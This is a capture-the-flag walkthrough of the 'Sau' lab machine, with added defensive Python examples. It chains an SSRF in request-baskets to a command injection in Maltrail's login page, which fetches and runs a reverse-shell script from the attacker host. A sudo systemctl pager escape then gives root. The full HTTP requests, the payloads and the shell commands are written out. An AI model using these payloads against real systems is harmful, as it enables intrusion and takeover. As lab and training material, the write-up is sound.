Sau

10

Machine:Linux

Level:easy

Information gathering

Nmap

 ┌──(root㉿kali)-[~]
 └─# nmap -sV -sC 10.10.11.224 
 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-23 20:39 EDT
 Nmap scan report for 10.10.11.224
 Host is up (0.14s latency).
 Not shown: 997 closed tcp ports (reset)
 PORT      STATE    SERVICE VERSION
 22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
 |   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
 |_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
 80/tcp    filtered http
 55555/tcp open     unknown
 | fingerprint-strings: 
 |   FourOhFourRequest: 
 |     HTTP/1.0 400 Bad Request
 |     Content-Type: text/plain; charset=utf-8
 |     X-Content-Type-Options: nosniff
 |     Date: Mon, 24 Jul 2023 00:41:10 GMT
 |     Content-Length: 75
 |     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
 |   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
 |     HTTP/1.1 400 Bad Request
 |     Content-Type: text/plain; charset=utf-8
 |     Connection: close
 |     Request
 |   GetRequest: 
 |     HTTP/1.0 302 Found
 |     Content-Type: text/html; charset=utf-8
 |     Location: /web
 |     Date: Mon, 24 Jul 2023 00:40:39 GMT
 |     Content-Length: 27
 |     href="/web">Found</a>.
 |   HTTPOptions: 
 |     HTTP/1.0 200 OK
 |     Allow: GET, OPTIONS
 |     Date: Mon, 24 Jul 2023 00:40:41 GMT
 |_    Content-Length: 0
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 145.31 seconds

Manual verification

55555

The page footer shows Powered by request-baskets | Version: 1.2.1

This version is affected by CVE-2023-27163

Exploitation

Exploit reference: https://notes.sjtu.edu.cn/s/MUUhEymt7#

  • The request-baskets service exposes the API endpoints /api/baskets/{name} and /baskets/{name}, where name is arbitrary; these endpoints accept a forward_url parameter, and that parameter is vulnerable to SSRF.

  • After a forward_url has been set via /api/baskets/{name}, visiting 10.10.11.224:55555/{name} triggers the SSRF (the server requests the given forward_url).

  • This turns port 55555 into a proxy for other ports (for example, direct access to port 80 is filtered, but through this SSRF the target host itself fetches port 80 and returns the content on port 55555).
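As an added defender-side example (not request-baskets code), this is the kind of destination check a forward_url setter needs so that a basket cannot be pointed at 127.0.0.1:80; the injectable resolver is an assumption so the check can run offline:

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical forward_url validator (added example, not request-baskets code).
# It rejects destinations whose addresses are loopback, RFC 1918, link-local
# (including 169.254.169.254), unspecified or IPv4-mapped, i.e. anything not global.


def _resolve_with_getaddrinfo(host):
    """Default resolver: every address the name currently resolves to."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def forward_url_is_safe(url, resolver=_resolve_with_getaddrinfo):
    """Return True only if url is http(s) and every resolved address is global.

    `resolver` is injectable so tests can supply addresses without DNS.
    Caveat: a check done at validation time can be defeated by DNS rebinding;
    a robust fix also enforces the same rule on the address actually used at
    connect time.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname  # urlsplit strips the [] around IPv6 literals
    try:
        # Literal IP in the URL: no resolution needed.
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError):
            return False
    if not addrs:
        return False
    # is_global is False for every special-purpose range, so one test covers
    # loopback, private, link-local and mapped addresses alike.
    return all(addr.is_global for addr in addrs)
```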

Create a new basket, capture the request in Burp Suite, and change forward_url to 127.0.0.1:80.

Request

 POST /api/baskets/king HTTP/1.1
 Host: 10.10.11.224:55555
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Length: 142

 {
   "forward_url": "http://127.0.0.1:80/",
   "proxy_response": true,
   "insecure_tls": false,
   "expand_path": true,
   "capacity": 250
 }
  • forward_url is the URL the server will request; since we do not know what the site on port 80 contains, the path is simply /.

  • proxy_response is set to true; it presumably controls whether the response from the forwarded URL is relayed back to the client.

Response

 HTTP/1.1 201 Created
 Content-Type: application/json; charset=UTF-8
 Date: Tue, 25 Jul 2023 06:32:17 GMT
 Content-Length: 56
 Connection: close

 {"token":"YPGwqVs7XJla4mbsl29qsu4GCyUd3nm6iZ0wXVy_M4Om"}

Visiting 10.10.11.224:55555/king now returns the port 80 site, whose footer reads Powered by Maltrail (v0.53). Searching shows this version has an RCE, so we create another basket to reach the login page.

Request

 POST /api/baskets/empress HTTP/1.1
 Host: 10.10.11.224:55555
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Length: 147

 {
   "forward_url": "http://127.0.0.1:80/login",
   "proxy_response": true,
   "insecure_tls": false,
   "expand_path": true,
   "capacity": 250
 }

Response

 HTTP/1.1 201 Created
 Content-Type: application/json; charset=UTF-8
 Date: Tue, 25 Jul 2023 06:32:46 GMT
 Content-Length: 56
 Connection: close

 {"token":"pu0ZpTiIGZHyv1Z0QIW8UKQNTjsLIQgyISKp3yzi_O3i"}

Reverse shell

Create a shell.sh containing:

 bash -i >& /dev/tcp/10.10.14.33/1234 0>&1

Start an HTTP server; the current directory becomes the web root

 python3 -m http.server 80

Listen on port 1234 on the attacking machine

Send the request to the login page

 POST /empress HTTP/1.1
 Host: 10.10.11.224:55555
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Type: application/x-www-form-urlencoded

 username=;`curl 10.10.14.33/shell.sh|bash`

 ┌──(root㉿kali)-[~]
 └─# nc -lnvp 1234
 listening on [any] 1234 ...
 connect to [10.10.14.33] from (UNKNOWN) [10.10.11.224] 56186
 bash: cannot set terminal process group (890): Inappropriate ioctl for device
 bash: no job control in this shell
 puma@sau:/opt/maltrail$ ls
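As an added illustration (not Maltrail's own code; the function names and logger format are hypothetical), the shell-interpolation pattern that lets the username payload above execute, beside a hardened version that never lets a shell parse user input:

```python
import re
import subprocess

# Added example, not Maltrail's code: a login path that hands the submitted
# username to a shell (here a hypothetical `logger` call), and its fix.
PAGE_PAYLOAD = ";`curl 10.10.14.33/shell.sh|bash`"  # username value from the request above
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def unsafe_auth_log_command(username, client_ip):
    """Vulnerable pattern: user input interpolated into a shell=True string.

    The shell expands backticks even inside double quotes, so `curl ...|bash`
    runs before logger ever sees its arguments. Returned rather than executed
    so the resulting command line can be inspected.
    """
    return (f"logger -p auth.info -t maltrail "
            f'"Failed login for {username} from {client_ip}"')


def safe_auth_log_argv(username, client_ip):
    """Hardened form: allowlist the value, then build an argv list.

    With shell=False every element reaches execve() verbatim; no shell parses
    the user-controlled text, so `;`, backticks and `|` are inert.
    """
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains characters outside the allowlist")
    return ["logger", "-p", "auth.info", "-t", "maltrail",
            f"Failed login for {username} from {client_ip}"]


def log_failed_login(username, client_ip, run=subprocess.run):
    """Log the attempt, or refuse; `run` is injectable so tests need not spawn logger."""
    try:
        argv = safe_auth_log_argv(username, client_ip)
    except ValueError:
        return False
    run(argv, shell=False, check=False)
    return True
```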

Privilege escalation

 puma@sau:/opt/maltrail$ sudo -l
 Matching Defaults entries for puma on sau:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

 User puma may run the following commands on sau:
     (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
 puma@sau:/$ script /dev/null /bin/bash
 script /dev/null /bin/bash
 Script started, file is /dev/null
 puma@sau:/$ sudo /usr/bin/systemctl status trail.service
 sudo /usr/bin/systemctl status trail.service
 WARNING: terminal is not fully functional
 -  (press RETURN)!sh
 !sshh!sh
 # whoami
 root